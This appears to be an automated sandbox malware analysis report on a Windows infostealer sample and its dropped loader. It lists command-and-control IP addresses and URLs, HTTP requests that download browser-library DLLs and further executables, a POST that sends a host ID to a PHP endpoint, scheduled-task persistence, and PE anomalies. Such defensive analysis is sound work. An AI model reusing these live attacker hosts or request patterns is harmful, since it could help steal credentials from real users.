Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BABD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 10_2_00BABD30
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 39 39 39 38 39 45 42 33 37 39 33 39 39 34 38 38 30 37 35 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 2d 2d 0d 0a Data Ascii: ------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="hwid"9799989EB3793994880753------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="build"default------BGIIDAEBGCAAECAKFHII--
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exeData
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpsJ0
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php6
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpE
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpI
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpO
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpY
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpe
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpg
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpq
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpx
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll9
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: 1jPL5zru3u.exe String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: 1jPL5zru3u.exe String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 1jPL5zru3u.exe String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889134366.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B48000.00000004.00000020.00020000.00000000.sdmp, DBKFHCFBGIIJKFHJDHDH.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B48000.00000004.00000020.00020000.00000000.sdmp, DBKFHCFBGIIJKFHJDHDH.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B48000.00000004.00000020.00020000.00000000.sdmp, DBKFHCFBGIIJKFHJDHDH.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B48000.00000004.00000020.00020000.00000000.sdmp, DBKFHCFBGIIJKFHJDHDH.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DBKFHCFBGIIJKFHJDHDH.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://support.mozilla.org
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 1jPL5zru3u.exe, 00000000.00000003.1726152515.00000000230BD000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: 1jPL5zru3u.exe, 00000000.00000003.1726152515.00000000230BD000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B48000.00000004.00000020.00020000.00000000.sdmp, DBKFHCFBGIIJKFHJDHDH.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B48000.00000004.00000020.00020000.00000000.sdmp, DBKFHCFBGIIJKFHJDHDH.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: 1jPL5zru3u.exe, 00000000.00000003.1726842265.0000000001A9D000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 1jPL5zru3u.exe, 00000000.00000003.1803657208.00000000293A0000.00000004.00000020.00020000.00000000.sdmp, DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 1jPL5zru3u.exe, 00000000.00000003.1803657208.00000000293A0000.00000004.00000020.00020000.00000000.sdmp, DGHDHIDGHIDGIECBKKJJJEHCFC.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000CF8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: .idata
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
PE file has nameless sections
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C3EED10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C42B700
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C42B8C0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C42B910
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C3CF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C35A0 0_2_6C3C35A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43545C 0_2_6C43545C
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43AC00 0_2_6C43AC00
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C405C10 0_2_6C405C10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C412C10 0_2_6C412C10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43542B 0_2_6C43542B
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D5440 0_2_6C3D5440
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C406CF0 0_2_6C406CF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D6C80 0_2_6C3D6C80
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CD4E0 0_2_6C3CD4E0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4234A0 0_2_6C4234A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42C4A0 0_2_6C42C4A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3ED4D0 0_2_6C3ED4D0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D64C0 0_2_6C3D64C0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F0512 0_2_6C3F0512
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EED10 0_2_6C3EED10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DFD00 0_2_6C3DFD00
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C400DD0 0_2_6C400DD0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4285F0 0_2_6C4285F0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C412E4E 0_2_6C412E4E
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C403E50 0_2_6C403E50
